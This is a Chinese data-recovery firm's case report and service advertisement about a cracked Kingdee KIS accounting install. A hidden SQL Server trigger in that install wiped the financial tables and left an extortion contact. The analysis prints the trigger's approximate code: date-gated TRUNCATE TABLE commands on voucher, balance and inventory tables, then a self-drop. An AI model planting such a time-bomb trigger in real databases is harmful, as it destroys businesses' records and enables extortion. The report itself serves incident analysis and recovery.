金蝶KIS专业版替换SXS.dll 遭后门清空数据被修改为【恢复数据联系QQ 735330197,2251434429】解决方法 修复工具。

金蝶KIS专业版 替换SXS.dll 遭后门清空数据(凭证被改为：恢复数据联系QQ 735330197,2251434429)恢复解决方法。

【客户名称】：山东青岛福隆发纺织品有限公司

【软件名称】：金蝶KIS专业版12.2

【数据库版本】：MS SQL server 2000  【数据库大小】：1GB  。

【问题描述】：客户贪图便宜，使用破解版财务软件，破解者破解后内藏了后门，清空所有数据的触发器。用了1年时间后，后门触发器被激活，删除了所有 科目余额表、存货余额、存货往来明细账、修改了所有 总账凭证、业务凭证、会计科目、内容为：恢复数据联系QQ 735330197，2251434429，使数据库全部瘫痪，所有账目混乱。没有备份，急需年度上报，急需恢复。

【问题分析】：接到电话后，客户发来遭后门修改数据库文件，立即组织对数据库分析工作，发现数据库内有一个后门触发器 t_log_autoNumbe ，大致代码内容为：

if (@FGLCurrYear=2014 and @FGLCurrPeriod>=1) or (@FICCurrYear=2014 and @FICCurrPeriod>=1)

begin
if (@Flogdays>=15)   
begin
TRUNCATE TABLE t_voucherEntry  --删除总账凭证
TRUNCATE TABLE t_balance --删除科目余额表
if @FVersion='8.0'  --版本大于8.0
TRUNCATE TABLE icstockbillEntry --删除存货出入库明细账
else
TRUNCATE TABLE t_cc_stockbillEntry --删除库存明细账
drop trigger t_log_AutoNumber
end
end
GO

通过大致代码内容，得知后门删除了哪些东西，用了什么方法！客户数据库文件是MSDE 为简单模型，没有日志记录，只能在现有MDF文件基础上，进行恢复！通过我们自主研发的提取工具，进行相关删除数据，修改数据反后门操作，得到凭证读写日志文件，科目余额表等于表，通过编写对应的分离程序，进行凭证拼装，成功恢复后门修改数据95%。

【恢复结果】：发回给客户测试验收，反馈数据基本正确，能恢复这个程度，客户很满意！得到客户的极大好评。

【温馨提示】：使用破解版软件，危害很大。居心不良的破解者，可能会留下后门木马，删除修改数据，敲诈钱财。如果商用，请使用正版软件！

【数据工程师】尹军   电话/微信/QQ：18302650920   欢迎来人来电咨询洽谈数据恢复。

1、系统崩溃只剩下Sqlserver数据文件的情况下的恢复.即无日志文件或者日志文件损坏情况下的恢复

2、SqlServer数据文件内部存在坏页情况下的恢复。

3、在Sql Server2000、SqlServer2005、SQL2008运行在简单日志模式、完全日志模式或者大容量日志记录模式下数据被误(drop、delete、truncate）删除表恢复,updata后的数据恢复等

4、Sql Serve文件无法附加情况下的数据恢复。

5、Sql Server数据库被标记为可疑，不可用等情况.

6、Sql Server2000、SqlServer2005、SQL2008数据库SysObjects等系统表损坏无法正常应用情况下的恢复.

7、Sql Server数据库只有数据文件 没有任何日志的情况下的恢复.

8、Sql Server数据文件被误删除情况下的恢复.

9、Sql Server2000、Sql Server2005、SQL2008数据库master数据库损坏而无法正常运行情况下的恢复。

10、Sql server还原时报一致性错误，错误823等情况下的数据恢复,各种错误提示的数据库文件修复

11、可恢复因硬盘坏道造成的数据库损坏

12、可修复日志收缩或突然断电后的数据库

13、可恢复多个关系型数据库

14、可恢复SQL数据库BKF备份文件以及BAK文件

15、磁盘阵列上的SQL SERVER数据库被误格式化等情况下的数据库恢复

16、可进行SQL SERVER数据库格式化，误删除，所有市面恢复软件无法恢复情况下的恢复，即碎片级数据库提取恢复。

17、可恢复Shade勒索病毒文件中毒被加密，数据库文件反敲诈服务。